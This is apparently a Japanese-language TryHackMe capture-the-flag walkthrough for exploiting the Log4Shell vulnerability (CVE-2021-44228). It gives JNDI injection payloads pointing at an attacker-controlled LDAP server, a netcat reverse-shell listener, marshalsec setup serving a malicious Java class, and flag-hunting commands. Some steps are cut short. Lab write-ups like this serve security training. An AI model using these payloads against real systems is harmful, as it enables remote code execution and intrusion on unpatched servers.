
Log4Shell 脆弱性 (CVE-2021-44228) を悪用してリモートコード実行とフラグ取得を行うためのステップバイステップの TryHackMe ウォークスルー。
プラットフォーム: TryHackMe 難易度: 中級 トピック: Log4Shell (Log4j 脆弱性)
Log4j の脆弱性 (CVE-2021-44228) を悪用してリモートコード実行を達成し、フラグを取得します。
nmap -sC -sV <TARGET_IP>
Log4j の脆弱性により JNDI インジェクションが可能:
${jndi:ldap://<ATTACKER_IP>:1389/a}
入力がログに記録される場合 → 脆弱性が存在します。
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAP サーバーを実行:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
悪意のある Java クラス (Exploit.class) を作成
脆弱なフィールドにペイロードを注入:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 以下のようなヘッダーを使用:
トリガー後:
確認:
sudo -l
探すもの:
find / -name flag.txt 2>/dev/null
cat flag.txt